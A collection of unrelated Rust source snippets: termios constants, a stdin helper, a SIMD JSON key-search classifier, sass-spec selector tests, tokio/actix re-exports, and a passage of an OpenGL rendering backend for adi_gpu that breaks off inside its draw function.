+pub const B28800: speed_t = 28800;
+pub const B57600: speed_t = 57600;
+pub const B76800: speed_t = 76800;
+pub const B115200: speed_t = 115200;
+pub const B230400: speed_t = 230400;
+// pub const B460800: speed_t = 460800;
+// pub const B921600: speed_t = 921600;
+pub const EXTA: speed_t = 19200;
+pub const EXTB: speed_t = 38400;
+
+// tcflow()
+pub const TCOOFF: c_int = 1;
+pub const TCOON: c_int = 2;
+pub const TCIOFF: c_int = 3;
+pub const TCION: c_int = 4;
+
+// tcflush()
+pub const TCIFLUSH: c_int = 1;
+pub const TCOFLUSH: c_int = 2;
+pub const TCIOFLUSH: c_int = 3;
+
+// tcsetattr()
+pub const TCSANOW: c_int = 0;
+pub const TCSADRAIN: c_int = 1;
+pub const TCSAFLUSH: c_int = 2;
+pub const TCSASOFT: c_int = 0x10;
|
use std::io::{stdin, Read};
/// Reads from stdin and returns the input with trailing whitespace removed.
///
/// NOTE(review): despite the name, `read_to_string` consumes *all* of stdin
/// (to EOF), not a single line — confirm callers rely on this behavior.
///
/// # Panics
/// Panics if reading fails or the input is not valid UTF-8.
pub fn read_line() -> String {
    let mut line = String::new();
    stdin().read_to_string(&mut line).unwrap();
    // `trim_right` is deprecated (since Rust 1.33); `trim_end` is identical.
    line.trim_end().to_owned()
}
|
//! Classification ignoring the structure of the JSON and looking for the occurrence
//! of a specific member name as quickly as possible.
use crate::{
input::{error::InputError, Input},
query::JsonString,
result::InputRecorder,
BLOCK_SIZE,
};
use cfg_if::cfg_if;
/// Classifier that can quickly find a member name in a byte stream.
///
/// `N` is the block size (in bytes) of the underlying [`Input`] iterator.
pub trait Memmem<'i, 'b, 'r, I: Input, const N: usize> {
    /// Find a member key identified by a given [`JsonString`].
    ///
    /// - `first_block` – optional first block to search; if not provided,
    /// the search will start at the next block returned by the underlying [`Input`] iterator.
    /// - `start_idx` – index of the start of search, either falling inside `first_block`,
    /// or at the start of the next block.
    ///
    /// On success, returns the index of the match and the block containing it,
    /// or `None` if the label does not occur.
    ///
    /// # Errors
    /// Errors when reading the underlying [`Input`] are propagated.
    fn find_label(
        &mut self,
        first_block: Option<I::Block<'i, N>>,
        start_idx: usize,
        label: &JsonString,
    ) -> Result<Option<(usize, I::Block<'i, N>)>, InputError>;
}
#[cfg(any(target_arch = "x86", target_arch = "x86_64"))]
mod avx2_32;
#[cfg(target_arch = "x86_64")]
mod avx2_64;
mod nosimd;
mod shared;
#[cfg(any(target_arch = "x86", target_arch = "x86_64"))]
mod ssse3_32;
#[cfg(target_arch = "x86_64")]
mod ssse3_64;
// Select the concrete Memmem implementation at compile time from the `simd`
// cfg flag. The sequential (nosimd) classifier is also used when building
// docs, so rustdoc does not depend on target SIMD features.
cfg_if! {
    if #[cfg(any(doc, not(feature = "simd")))] {
        type MemmemImpl<'a, 'b, 'r, I, R> = nosimd::SequentialMemmemClassifier<'a, 'b, 'r, I, R, BLOCK_SIZE>;
    }
    else if #[cfg(all(simd = "avx2_64", target_arch = "x86_64"))] {
        type MemmemImpl<'a, 'b, 'r, I, R> = avx2_64::Avx2MemmemClassifier64<'a, 'b, 'r, I, R>;
    }
    else if #[cfg(all(simd = "avx2_32", any(target_arch = "x86_64", target_arch = "x86")))] {
        type MemmemImpl<'a, 'b, 'r, I, R> = avx2_32::Avx2MemmemClassifier32<'a, 'b, 'r, I, R>;
    }
    else if #[cfg(all(simd = "ssse3_64", target_arch = "x86_64"))] {
        type MemmemImpl<'a, 'b, 'r, I, R> = ssse3_64::Ssse3MemmemClassifier64<'a, 'b, 'r, I, R>;
    }
    else if #[cfg(all(simd = "ssse3_32", any(target_arch = "x86_64", target_arch = "x86")))] {
        type MemmemImpl<'a, 'b, 'r, I, R> = ssse3_32::Ssse3MemmemClassifier32<'a, 'b, 'r, I, R>;
    }
    else {
        compile_error!("Target architecture is not supported by SIMD features of this crate. Disable the default `simd` feature.");
    }
}
/// Construct a [`Memmem`] classifier that searches `input` for member names,
/// reading blocks through `iter`.
///
/// The concrete implementation is chosen at compile time from the `simd`
/// configuration (see `MemmemImpl`).
// NOTE(review): the previous doc comment ("walk through the JSON document …
// and classify quoted sequences") was copy-pasted from a different
// classifier and did not describe this function.
#[must_use]
#[inline(always)]
pub fn memmem<'i, 'b, 'r, I, R>(
    input: &'i I,
    iter: &'b mut I::BlockIterator<'i, 'r, BLOCK_SIZE, R>,
) -> impl Memmem<'i, 'b, 'r, I, BLOCK_SIZE>
where
    I: Input,
    R: InputRecorder<I::Block<'i, BLOCK_SIZE>>,
    'i: 'r,
{
    MemmemImpl::new(input, iter)
}
|
//! Tests auto-converted from "sass-spec/spec/libsass-closed-issues/issue_1441"
#[allow(unused)]
use super::rsass;
// From "sass-spec/spec/libsass-closed-issues/issue_1441/adjacent.hrx"
// Verifies that a nested `& + &` selector expands to
// `.adjacent + .adjacent` (parent selector on both sides of the combinator).
#[test]
fn adjacent() {
    assert_eq!(
        rsass(
            ".adjacent {\
            \n  & + & {\
            \n    foo: bar;\
            \n  }\
            \n}\
            \n"
        )
        .unwrap(),
        ".adjacent + .adjacent {\
        \n  foo: bar;\
        \n}\
        \n"
    );
}
// From "sass-spec/spec/libsass-closed-issues/issue_1441/child.hrx"
// Verifies that a nested `& > &` selector expands to `.child > .child`.
#[test]
fn child() {
    assert_eq!(
        rsass(
            ".child {\
            \n  & > & {\
            \n    foo: bar;\
            \n  }\
            \n}\
            \n"
        )
        .unwrap(),
        ".child > .child {\
        \n  foo: bar;\
        \n}\
        \n"
    );
}
// From "sass-spec/spec/libsass-closed-issues/issue_1441/sibling.hrx"
// Verifies that a nested `& ~ &` selector expands to `.sibling ~ .sibling`.
#[test]
fn sibling() {
    assert_eq!(
        rsass(
            ".sibling {\
            \n  & ~ & {\
            \n    foo: bar;\
            \n  }\
            \n}\
            \n"
        )
        .unwrap(),
        ".sibling ~ .sibling {\
        \n  foo: bar;\
        \n}\
        \n"
    );
}
|
pub use actix::prelude::*;
pub use bytes::{BufMut, BytesMut};
pub use std::net::SocketAddr;
pub use std::sync::Arc;
pub use tokio::io::AsyncReadExt;
pub use tokio::io::AsyncWriteExt;
pub use tokio::io::ReadHalf;
pub use tokio::io::WriteHalf;
pub use tokio::net::{TcpListener, TcpStream};
pub use tokio::sync::broadcast;
|
// Copyright Jeron A. Lau 2018.
// Dual-licensed under either the MIT License or the Boost Software License,
// Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// https://www.boost.org/LICENSE_1_0.txt)
//! OpenGL implementation for adi_gpu.
extern crate asi_opengl;
extern crate adi_gpu_base;
use std::mem;
pub use base::Shape;
pub use base::Gradient;
pub use base::Model;
pub use base::TexCoords;
pub use base::Texture;
use adi_gpu_base as base;
use asi_opengl::{
OpenGL, OpenGLBuilder, VertexData, Program, Buffer, UniformData,
Feature, Topology,
};
use adi_gpu_base::*;
// GLSL shader sources embedded at compile time, one pair per render style.
// (`'static` dropped: it is redundant on `const` references — clippy
// `redundant_static_lifetimes`.)
const SHADER_SOLID_FRAG: &[u8] = include_bytes!("shaders/solid-frag.glsl");
const SHADER_SOLID_VERT: &[u8] = include_bytes!("shaders/solid-vert.glsl");
const SHADER_GRADIENT_FRAG: &[u8] = include_bytes!("shaders/gradient-frag.glsl");
const SHADER_GRADIENT_VERT: &[u8] = include_bytes!("shaders/gradient-vert.glsl");
const SHADER_TEX_FRAG: &[u8] = include_bytes!("shaders/texture-frag.glsl");
const SHADER_TEX_VERT: &[u8] = include_bytes!("shaders/texture-vert.glsl");
const SHADER_FADED_VERT: &[u8] = include_bytes!("shaders/faded-vert.glsl");
const SHADER_TINTED_FRAG: &[u8] = include_bytes!("shaders/tinted-frag.glsl");
const SHADER_COMPLEX_VERT: &[u8] = include_bytes!("shaders/complex-vert.glsl");
const SHADER_COMPLEX_FRAG: &[u8] = include_bytes!("shaders/complex-frag.glsl");
// Indices into `Display::styles`; must match the order the styles array is
// built in `new()` (gradient, texture, faded, tinted, solid, complex).
const STYLE_GRADIENT: usize = 0;
const STYLE_TEXTURE: usize = 1;
const STYLE_FADED: usize = 2;
const STYLE_TINTED: usize = 3;
const STYLE_SOLID: usize = 4;
const STYLE_COMPLEX: usize = 5;
/// A compiled shader program plus handles to its uniforms and vertex
/// attributes. Not every shader uses every handle; unused lookups are
/// expected to return inert handles.
struct Style {
    shader: Program,
    matrix_uniform: UniformData,
    has_camera: UniformData,
    camera_uniform: UniformData,
    has_fog: UniformData,
    fog: UniformData,
    range: UniformData,
    alpha: UniformData,
    color: UniformData,
    position: VertexData,
    texpos: VertexData,
    acolor: VertexData,
}
impl Style {
    // Create a new style.
    // Compiles/links the program and resolves all uniform / attribute
    // locations up front (names are NUL-terminated byte strings for GL).
    fn new(context: &OpenGL, vert: &[u8], frag: &[u8]) -> Style {
        let shader = Program::new(context, vert, frag);
        let matrix_uniform = shader.uniform(b"models_tfm\0");
        let has_camera = shader.uniform(b"has_camera\0");
        let camera_uniform = shader.uniform(b"matrix\0");
        let has_fog = shader.uniform(b"has_fog\0");
        let fog = shader.uniform(b"fog\0");
        let range = shader.uniform(b"range\0");
        let alpha = shader.uniform(b"alpha\0");
        let color = shader.uniform(b"color\0");
        let position = shader.vertex_data(b"position\0");
        let texpos = shader.vertex_data(b"texpos\0");
        let acolor = shader.vertex_data(b"acolor\0");
        Style {
            shader, matrix_uniform, has_camera, camera_uniform, fog,
            range, position, texpos, alpha, has_fog, color, acolor,
        }
    }
}
/// Everything needed to draw one shape: which style renders it, its GPU
/// buffers, per-shape uniforms, and its transform.
struct ShapeData {
    style: usize,                       // index into Display::styles
    buffers: [Option<Buffer>; 2],       // optional texcoord / vertex-color buffers
    has_fog: bool,
    alpha: Option<f32>,                 // uniform alpha override, if any
    color: Option<[f32; 4]>,            // uniform color override, if any
    transform: Transform, // Transformation matrix.
    texture: Option<asi_opengl::Texture>,
    vertex_buffer: Buffer,
    fans: Vec<(u32, u32)>,              // (start, count) triangle-fan ranges
}
impl ::adi_gpu_base::Point for ShapeData {
    // Used by z-sorting to order shapes relative to the camera.
    fn point(&self) -> Vec3 {
        // Position vector at origin * object transform.
        (self.transform.0 * vec4!(0f32, 0f32, 0f32, 1f32)).xyz()
    }
}
/// Vertex positions for a model (4 floats per vertex) plus its fan ranges.
struct ModelData {
    vertex_buffer: Buffer,
    // TODO alot could be in base as duplicate
    vertex_count: u32,
    fans: Vec<(u32, u32)>,
}
/// Texture coordinates buffer (4 floats per vertex).
struct TexcoordsData {
    vertex_buffer: Buffer,
    vertex_count: u32,
}
/// Per-vertex color buffer (4 floats per vertex).
struct GradientData {
    vertex_buffer: Buffer,
    vertex_count: u32,
}
/// Wrapper around an uploaded OpenGL texture.
struct TextureData {
    t: asi_opengl::Texture,
}
/// To render anything with adi_gpu, you have to make a `Display`
///
/// Owns the window, the GL context, all GPU resources, and the three draw
/// lists: opaque shapes (drawn front-to-back), alpha-blended shapes (drawn
/// back-to-front), and GUI shapes (drawn last, unsorted, no depth test).
pub struct Display {
    window: adi_gpu_base::Window,
    context: OpenGL,
    color: (f32, f32, f32),        // clear color; also used as the fog color
    opaque_ind: Vec<u32>,          // z-sorted indices into opaque_vec
    alpha_ind: Vec<u32>,           // z-sorted indices into alpha_vec
    opaque_vec: Vec<ShapeData>,
    alpha_vec: Vec<ShapeData>,
    gui_vec: Vec<ShapeData>,
    models: Vec<ModelData>,
    texcoords: Vec<TexcoordsData>,
    gradients: Vec<GradientData>,
    textures: Vec<TextureData>,
    styles: [Style; 6],            // indexed by the STYLE_* constants
    xyz: Vec3,                     // camera position
    rotate_xyz: Vec3,              // camera rotation
    ar: f32,                       // aspect ratio
    projection: Transform,
}
/// Creates the window and OpenGL display.
///
/// Returns an error string on platforms where OpenGL window creation is not
/// (yet) supported.
pub fn new(title: &str, icon: &afi::Video) -> Result<Box<Display>, &'static str>
{
    if let Some(tuple) = OpenGLBuilder::new() {
        let (builder, v) = tuple;
        let window = adi_gpu_base::Window::new(title, icon, Some(v));
        // Hand the platform-specific native window handle to the GL builder.
        let context = builder.to_opengl(match window.get_connection() {
            WindowConnection::Xcb(_, window) => // |
            // WindowConnection::Windows(_, window) =>
            {
                // NOTE(review): reinterprets the XCB window id as the handle
                // type expected by asi_opengl — confirm on 32-bit targets.
                unsafe {mem::transmute(window as usize)}
            },
            WindowConnection::Windows(_, window) => {
                window
            }
            WindowConnection::Wayland => return Err(
                "OpenGL support on Wayland is WIP"),
            WindowConnection::DirectFB => return Err(
                "OpenGL support on DirectFB is WIP"),
            WindowConnection::Android => return Err(
                "OpenGL support on Android is WIP"),
            WindowConnection::IOS => return Err(
                "OpenGL support on iOS is WIP"),
            WindowConnection::AldaronsOS => return Err(
                "AldaronsOS doesn't support OpenGL"),
            WindowConnection::Arduino => return Err(
                "Arduino doesn't support OpenGL"),
            WindowConnection::Switch => return Err(
                "Nintendo Switch doesn't support OpenGL"),
            WindowConnection::Web => return Err(
                "WebGL support is WIP"),
            WindowConnection::NoOS => return Err(
                "NoOS doesn't support OpenGL"),
        });
        // Set the settings.
        context.disable(Feature::Dither);
        context.enable(Feature::CullFace);
        context.enable(Feature::Blend);
        context.blend();
        // Load shaders
        let style_solid = Style::new(&context,
            SHADER_SOLID_VERT, SHADER_SOLID_FRAG);
        let style_gradient = Style::new(&context,
            SHADER_GRADIENT_VERT, SHADER_GRADIENT_FRAG);
        let style_texture = Style::new(&context,
            SHADER_TEX_VERT, SHADER_TEX_FRAG);
        let style_faded = Style::new(&context,
            SHADER_FADED_VERT, SHADER_TEX_FRAG);
        let style_tinted = Style::new(&context,
            SHADER_TEX_VERT, SHADER_TINTED_FRAG);
        let style_complex = Style::new(&context,
            SHADER_COMPLEX_VERT, SHADER_COMPLEX_FRAG);
        let wh = window.wh();
        let ar = wh.0 as f32 / wh.1 as f32;
        // 90° (0.5π) field of view.
        let projection = base::projection(ar, 0.5 * PI);
        // Adjust the viewport
        context.viewport(wh.0, wh.1);
        let mut display = ::Display {
            window,
            context,
            color: (0.0, 0.0, 0.0),
            alpha_ind: vec![],
            opaque_ind: vec![],
            alpha_vec: vec![],
            opaque_vec: vec![],
            gui_vec: vec![],
            models: vec![],
            texcoords: vec![],
            gradients: vec![],
            textures: vec![],
            // Order must match the STYLE_* index constants.
            styles: [
                style_gradient,
                style_texture,
                style_faded,
                style_tinted,
                style_solid,
                style_complex,
            ],
            xyz: vec3!(0.0, 0.0, 0.0),
            rotate_xyz: vec3!(0.0, 0.0, 0.0),
            ar,
            projection,
        };
        use base::Display;
        // Initialize the camera uniforms with an identity camera.
        display.camera(vec3!(0.0, 0.0, 0.0), vec3!(0.0, 0.0, 0.0));
        Ok(Box::new(display))
    } else {
        Err("Couldn't find OpenGL!")
    }
}
impl base::Display for Display {
    /// Sets the background clear color (also used as the fog color).
    fn color(&mut self, color: (f32, f32, f32)) {
        self.color = color;
        self.context.color(color.0, color.1, color.2);
    }
    /// Processes pending window input; if there is none, renders one frame
    /// (opaque front-to-back, alpha back-to-front, then GUI) and swaps
    /// buffers. Returns `Some(input)` if input was handled instead of drawing.
    fn update(&mut self) -> Option<adi_gpu_base::Input> {
        if let Some(input) = self.window.update() {
            return Some(input);
        }
        // Update Window:
        // TODO: This is copied pretty much from adi_gpu_vulkan. Move
        // to the base.
        // Opaque & Alpha Shapes need a camera.
        for i in (&self.styles).iter() {
            i.has_camera.set_int1(1);
        }
        // Enable for 3D depth testing
        self.context.enable(Feature::DepthTest);
        // sort nearest
        ::adi_gpu_base::zsort(&mut self.opaque_ind, &self.opaque_vec,
            true, self.xyz);
        for shape in self.opaque_vec.iter() {
            draw_shape(&self.styles[shape.style], shape);
        }
        // sort farthest
        ::adi_gpu_base::zsort(&mut self.alpha_ind, &self.alpha_vec,
            false, self.xyz);
        for shape in self.alpha_vec.iter() {
            draw_shape(&self.styles[shape.style], shape);
        }
        // Disable Depth Testing for GUI
        self.context.disable(Feature::DepthTest);
        // Gui Elements don't want a camera.
        for i in (&self.styles).iter() {
            i.has_camera.set_int1(0);
        }
        // No need to sort gui elements.
        for shape in self.gui_vec.iter() {
            draw_shape(&self.styles[shape.style], shape);
        }
        // end todo
        self.context.update();
        // Return None, there was no input, updated screen.
        None
    }
    /// Moves/rotates the camera and uploads the combined
    /// translate→rotate→project matrix to every style's camera uniform.
    fn camera(&mut self, xyz: Vec3, rotate_xyz: Vec3) {
        // Set Camera
        self.xyz = xyz;
        self.rotate_xyz = rotate_xyz;
        // Write To Camera Uniforms. TODO: only before use (not here).
        // TODO this assignment copied from vulkan implementation. Put
        // in the base library.
        let cam = Transform::IDENTITY
            .t(vec3!()-self.xyz) // Move camera - TODO: negation operator?
            .r(vec3!()-self.rotate_xyz) // Rotate camera - TODO: negation operator?
            .m(self.projection.0); // Apply projection to camera
        for i in (&self.styles).iter() {
            i.camera_uniform.set_mat4(cam.into());
        }
    }
fn model(&mut self, vertices: &[f32], fans: Vec<(u32, u32)>) -> Model {
// TODO most is duplicate from other implementation.
let index = self.models.len();
let buffer = Buffer::new(&self.context);
let vertex_buffer = buffer;
vertex_buffer.set(vertices);
self.models.push(ModelData {
vertex_buffer, vertex_count: vertices.len() as u32 / 4,
fans
});
Model(index)
}
/// Set the fog color and range uniforms on every style.
///
/// The fog color is the current clear color.  `Some((a, b))` writes the
/// pair into the range uniform; `None` disables fog by pushing the range
/// start out to `f32::MAX`.
/// (Removed the redundant `-> ()` return type — clippy `unused_unit`;
/// the signature is otherwise unchanged.)
fn fog(&mut self, fog: Option<(f32, f32)>) {
    let fogc = [self.color.0, self.color.1, self.color.2, 1.0];
    let fogr = if let Some(fog) = fog {
        [fog.0, fog.1]
    } else {
        // No fog: range begins beyond any drawable distance.
        [::std::f32::MAX, 0.0]
    };
    for i in (&self.styles).iter() {
        i.fog.set_vec4(&fogc);
        i.range.set_vec2(&fogr);
    }
}
/// Upload a `w` x `h` image from `graphic` into a new backend texture
/// and register it; the returned handle carries index and dimensions.
fn texture(&mut self, wh: (u16,u16), graphic: &VFrame) -> Texture {
    let (w, h) = wh;
    let pixels = graphic.0.as_slice();
    let t = self.context.texture();
    t.set(w, h, pixels);
    let a = self.textures.len();
    self.textures.push(TextureData { t });
    Texture(a, w, h)
}
/// Upload per-vertex colors (4 floats each) into a new buffer and
/// register it as a gradient; returns a handle into `self.gradients`.
fn gradient(&mut self, colors: &[f32]) -> Gradient {
    // TODO: A lot of duplication here from adi_gpu_vulkan. Put in
    // base.
    let vertex_buffer = Buffer::new(&self.context);
    vertex_buffer.set(colors);
    let a = self.gradients.len();
    self.gradients.push(GradientData {
        vertex_buffer,
        // 4 components per vertex.
        vertex_count: colors.len() as u32 / 4,
    });
    Gradient(a)
}
/// Upload texture coordinates (4 floats per vertex, matching the model
/// vertex layout) into a new buffer; returns a handle into
/// `self.texcoords`.
fn texcoords(&mut self, texcoords: &[f32]) -> TexCoords {
    // TODO: A lot of duplication here from adi_gpu_vulkan. Put in
    // base.
    let vertex_buffer = Buffer::new(&self.context);
    vertex_buffer.set(texcoords);
    let a = self.texcoords.len();
    self.texcoords.push(TexcoordsData {
        vertex_buffer,
        // 4 components per vertex.
        vertex_count: texcoords.len() as u32 / 4,
    });
    TexCoords(a)
}
/// Replace the pixel contents of an existing texture in place.
fn set_texture(&mut self, texture: &mut Texture, wh: (u16,u16),
    graphic: &VFrame)
{
    self.textures[texture.0].t.set(wh.0, wh.1,
        graphic.0.as_slice());
}
/// Create a single-color shape from `model`.
///
/// Routing (shared by all `shape_*` constructors): a shape with neither
/// camera nor fog goes on the GUI list; otherwise `blending` selects
/// the depth-sorted alpha list or the opaque list.
#[inline(always)]
fn shape_solid(&mut self, model: &Model, transform: Transform,
    color: [f32; 4], blending: bool, fog: bool, camera: bool)
    -> Shape
{
    let shape = ShapeData {
        style: STYLE_SOLID,
        // No per-vertex texcoord or gradient data for a solid shape.
        buffers: [None, None],
        has_fog: fog,
        alpha: None,
        color: Some(color),
        texture: None,
        vertex_buffer: self.models[model.0].vertex_buffer.clone(),
        transform, // Transformation matrix.
        fans: self.models[model.0].fans.clone(),
    };
    base::new_shape(if !camera && !fog {
        // GUI shapes are drawn last, unsorted, without the camera.
        let index = self.gui_vec.len() as u32;
        self.gui_vec.push(shape);
        base::ShapeHandle::Gui(index)
    } else if blending {
        let index = self.alpha_vec.len() as u32;
        self.alpha_vec.push(shape);
        self.alpha_ind.push(index);
        base::ShapeHandle::Alpha(index)
    } else {
        let index = self.opaque_vec.len() as u32;
        self.opaque_vec.push(shape);
        self.opaque_ind.push(index);
        base::ShapeHandle::Opaque(index)
    })
}
/// Create a per-vertex-colored shape from `model` and a `Gradient`.
///
/// # Panics
/// If the gradient's color count does not match the model's vertex
/// count.
#[inline(always)]
fn shape_gradient(&mut self, model: &Model, transform: Transform,
    colors: Gradient, blending: bool, fog: bool, camera: bool)
    -> Shape
{
    // TODO: is copied from adi_gpu_vulkan, move to base
    if self.models[model.0].vertex_count
        != self.gradients[colors.0].vertex_count
    {
        // Fixed error message: this check compares the model's vertex
        // count against the gradient (texcoords are not involved).
        panic!("Model vertex count doesn't match gradient length");
    }
    let shape = ShapeData {
        style: STYLE_GRADIENT,
        // Gradient colors ride in buffer slot 0 for this style.
        buffers: [
            Some(self.gradients[colors.0].vertex_buffer.clone()),
            None
        ],
        has_fog: fog,
        alpha: None,
        color: None,
        texture: None,
        vertex_buffer: self.models[model.0].vertex_buffer.clone(),
        transform, // Transformation matrix.
        fans: self.models[model.0].fans.clone(),
    };
    base::new_shape(if !camera && !fog {
        // GUI shapes: drawn last, unsorted, without the camera.
        let index = self.gui_vec.len() as u32;
        self.gui_vec.push(shape);
        base::ShapeHandle::Gui(index)
    } else if blending {
        let index = self.alpha_vec.len() as u32;
        self.alpha_vec.push(shape);
        self.alpha_ind.push(index);
        base::ShapeHandle::Alpha(index)
    } else {
        let index = self.opaque_vec.len() as u32;
        self.opaque_vec.push(shape);
        self.opaque_ind.push(index);
        base::ShapeHandle::Opaque(index)
    })
}
/// Create a textured shape from `model`, a registered texture, and a
/// matching set of texture coordinates.
#[inline(always)]
fn shape_texture(&mut self, model: &Model, transform: Transform,
    texture: &Texture, tc: TexCoords, blending: bool, fog: bool,
    camera: bool) -> Shape
{
    // TODO: from adi_gpu_vulkan, move to the base
    if self.models[model.0].vertex_count
        != self.texcoords[tc.0].vertex_count
    {
        panic!("TexCoord length doesn't match vertex length");
    }
    let shape = ShapeData {
        style: STYLE_TEXTURE,
        // Texcoords ride in buffer slot 0 for this style.
        buffers: [
            Some(self.texcoords[tc.0].vertex_buffer.clone()),
            None
        ],
        has_fog: fog,
        alpha: None,
        color: None,
        texture: Some(self.textures[texture.0].t.clone()),
        vertex_buffer: self.models[model.0].vertex_buffer.clone(),
        transform, // Transformation matrix.
        fans: self.models[model.0].fans.clone(),
    };
    // Same GUI / alpha / opaque routing as the other shape_* methods.
    base::new_shape(if !camera && !fog {
        let index = self.gui_vec.len() as u32;
        self.gui_vec.push(shape);
        base::ShapeHandle::Gui(index)
    } else if blending {
        let index = self.alpha_vec.len() as u32;
        self.alpha_vec.push(shape);
        self.alpha_ind.push(index);
        base::ShapeHandle::Alpha(index)
    } else {
        let index = self.opaque_vec.len() as u32;
        self.opaque_vec.push(shape);
        self.opaque_ind.push(index);
        base::ShapeHandle::Opaque(index)
    })
}
/// Create a textured shape with a uniform extra `alpha` fade.
///
/// Unlike the other `shape_*` constructors there is no `blending` flag:
/// a faded shape always goes to the alpha (blended) list unless it
/// qualifies as a GUI shape.
#[inline(always)]
fn shape_faded(&mut self, model: &Model, transform: Transform,
    texture: &Texture, tc: TexCoords, alpha: f32, fog: bool,
    camera: bool) -> Shape
{
    // TODO: from adi_gpu_vulkan, move to the base
    if self.models[model.0].vertex_count
        != self.texcoords[tc.0].vertex_count
    {
        panic!("TexCoord length doesn't match vertex length");
    }
    let shape = ShapeData {
        style: STYLE_FADED,
        buffers: [
            Some(self.texcoords[tc.0].vertex_buffer.clone()),
            None
        ],
        has_fog: fog,
        alpha: Some(alpha),
        color: None,
        texture: Some(self.textures[texture.0].t.clone()),
        vertex_buffer: self.models[model.0].vertex_buffer.clone(),
        transform, // Transformation matrix.
        fans: self.models[model.0].fans.clone(),
    };
    base::new_shape(if !camera && !fog {
        let index = self.gui_vec.len() as u32;
        self.gui_vec.push(shape);
        base::ShapeHandle::Gui(index)
    } else {
        // Always blended: no opaque branch for faded shapes.
        let index = self.alpha_vec.len() as u32;
        self.alpha_vec.push(shape);
        self.alpha_ind.push(index);
        base::ShapeHandle::Alpha(index)
    })
}
/// Create a textured shape whose texture is modulated by a single
/// RGBA `tint` color.
#[inline(always)]
fn shape_tinted(&mut self, model: &Model, transform: Transform,
    texture: &Texture, tc: TexCoords, tint: [f32; 4], blending: bool,
    fog: bool, camera: bool) -> Shape
{
    // TODO: from adi_gpu_vulkan, move to the base
    if self.models[model.0].vertex_count
        != self.texcoords[tc.0].vertex_count
    {
        panic!("TexCoord length doesn't match vertex length");
    }
    let shape = ShapeData {
        style: STYLE_TINTED,
        buffers: [
            Some(self.texcoords[tc.0].vertex_buffer.clone()),
            None,
        ],
        has_fog: fog,
        alpha: None,
        // The tint rides in the shape's color slot.
        color: Some(tint),
        texture: Some(self.textures[texture.0].t.clone()),
        vertex_buffer: self.models[model.0].vertex_buffer.clone(),
        transform, // Transformation matrix.
        fans: self.models[model.0].fans.clone(),
    };
    // Same GUI / alpha / opaque routing as the other shape_* methods.
    base::new_shape(if !camera && !fog {
        let index = self.gui_vec.len() as u32;
        self.gui_vec.push(shape);
        base::ShapeHandle::Gui(index)
    } else if blending {
        let index = self.alpha_vec.len() as u32;
        self.alpha_vec.push(shape);
        self.alpha_ind.push(index);
        base::ShapeHandle::Alpha(index)
    } else {
        let index = self.opaque_vec.len() as u32;
        self.opaque_vec.push(shape);
        self.opaque_ind.push(index);
        base::ShapeHandle::Opaque(index)
    })
}
/// Create a textured shape with a per-vertex tint gradient.
///
/// # Panics
/// If the texcoord count or the gradient count does not match the
/// model's vertex count.
#[inline(always)]
fn shape_complex(&mut self, model: &Model, transform: Transform,
    texture: &Texture, tc: TexCoords, tints: Gradient,
    blending: bool, fog: bool, camera: bool) -> Shape
{
    // TODO: from adi_gpu_vulkan, move to the base
    if self.models[model.0].vertex_count
        != self.texcoords[tc.0].vertex_count
    {
        panic!("TexCoord length doesn't match vertex length");
    }
    // TODO: is copied from adi_gpu_vulkan, move to base
    if self.models[model.0].vertex_count
        != self.gradients[tints.0].vertex_count
    {
        // Fixed error message: this second check compares the model
        // against the gradient, not against the texcoords.
        panic!("Model vertex count doesn't match gradient length");
    }
    let shape = ShapeData {
        style: STYLE_COMPLEX,
        // Slot 0: texcoords; slot 1: tint gradient.
        buffers: [
            Some(self.texcoords[tc.0].vertex_buffer.clone()),
            Some(self.gradients[tints.0].vertex_buffer.clone()),
        ],
        has_fog: fog,
        alpha: None,
        color: None,
        texture: Some(self.textures[texture.0].t.clone()),
        vertex_buffer: self.models[model.0].vertex_buffer.clone(),
        transform, // Transformation matrix.
        fans: self.models[model.0].fans.clone(),
    };
    base::new_shape(if !camera && !fog {
        let index = self.gui_vec.len() as u32;
        self.gui_vec.push(shape);
        base::ShapeHandle::Gui(index)
    } else if blending {
        let index = self.alpha_vec.len() as u32;
        self.alpha_vec.push(shape);
        self.alpha_ind.push(index);
        base::ShapeHandle::Alpha(index)
    } else {
        let index = self.opaque_vec.len() as u32;
        self.opaque_vec.push(shape);
        self.opaque_ind.push(index);
        base::ShapeHandle::Opaque(index)
    })
}
#[inline(always)]
fn drop_shape(&mut self, shape: &Shape) {
match get_shape(&shape) {
ShapeHandle::Opaque(x) => {
let index = self.opaque_ind.iter()
.position(|y| *y == x).unwrap();
self.opaque_ind.remove(index);
},
ShapeHandle::Alpha(x) => {
let index = self.alpha_ind.iter()
.position(|y| *y == x).unwrap();
self.alpha_ind.remove(index);
},
ShapeHandle::Gui(x) => {
// TODO: make it obvious that there's only meant
// to be 1 GUI object.
self.gui_vec.clear();
},
}
}
/// Replace the transformation matrix of an existing shape in whichever
/// list (opaque / alpha / GUI) holds it.
fn transform(&mut self, shape: &Shape, transform: Transform) {
    // TODO: put in base, some is copy from vulkan implementation.
    match base::get_shape(shape) {
        ShapeHandle::Opaque(x) => {
            let x = x as usize; // for indexing
            self.opaque_vec[x].transform = transform;
        },
        ShapeHandle::Alpha(x) => {
            let x = x as usize; // for indexing
            self.alpha_vec[x].transform = transform;
        },
        ShapeHandle::Gui(x) => {
            let x = x as usize; // for indexing
            self.gui_vec[x].transform = transform;
        },
    }
}
/// Handle a window resize: update aspect ratio, viewport and projection,
/// then rebuild the camera uniforms via `camera()`.
/// (Removed the redundant `-> ()` return type — clippy `unused_unit`.)
fn resize(&mut self, wh: (u16, u16)) {
    // Snapshot camera state so we can re-apply it after the projection
    // changes (`camera()` takes `&mut self`).
    let xyz = self.xyz;
    let rotate_xyz = self.rotate_xyz;
    self.ar = wh.0 as f32 / wh.1 as f32;
    self.context.viewport(wh.0, wh.1);
    // 0.5 * PI = 90-degree field of view.
    self.projection = ::base::projection(self.ar, 0.5 * PI);
    self.camera(xyz, rotate_xyz);
}
/// Current window dimensions as (width, height).
fn wh(&self) -> (u16, u16) {
    self.window.wh()
}
}
/// Issue the backend draw calls for one shape using the given style
/// (shader program plus its uniform/attribute handles).
fn draw_shape(style: &Style, shape: &ShapeData) {
    // Per-shape model transform.
    style.matrix_uniform.set_mat4(shape.transform.into());
    if !style.texpos.is_none() {
        // Set texpos for the program from the texpos buffer.
        style.texpos.set(shape.buffers[0].as_ref().unwrap());
        // Bind the texture
        shape.texture.as_ref().unwrap().bind();
    }
    if !style.acolor.is_none() {
        // Set colors for the program from the color buffer.
        // TODO: probably shouldn't be same buffer as texpos.
